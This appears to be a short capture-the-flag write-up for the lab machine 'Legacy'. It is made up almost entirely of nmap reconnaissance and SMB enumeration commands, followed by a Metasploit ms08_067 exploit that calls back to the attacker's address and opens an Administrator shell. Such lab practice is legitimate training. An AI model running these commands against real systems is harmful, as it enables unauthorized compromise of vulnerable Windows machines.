Ping
Ping 10.10.10.4
Nmap default Scan
nmap 10.10.10.4 -oN dnmap
Script and Service Scan
nmap 10.10.10.4 -sC -sV -oN snmap
All port Scan
nmap 10.10.10.4 -sC -sV -p- --open -T5 -oN anmap
SMB Enumeration
nmap --script smb-vuln* --script smb-enum-shares.nse --script smb-enum-users.nse -p139,445 10.10.10.4 -oN smb_enum
We have vulnerable smb running on the machine.
Will try to exploit it…!
Using Metasploit
msfconsole
search ms08_067
use 0
set RHOST 10.10.10.4
set LHOST 10.10.14.7
exploit
shell
We are already Administrator, so no need Privilege escalation
We got user.txt in John’s desktop
We got root.txt in Admin’s desktop
Done with Legacy…:)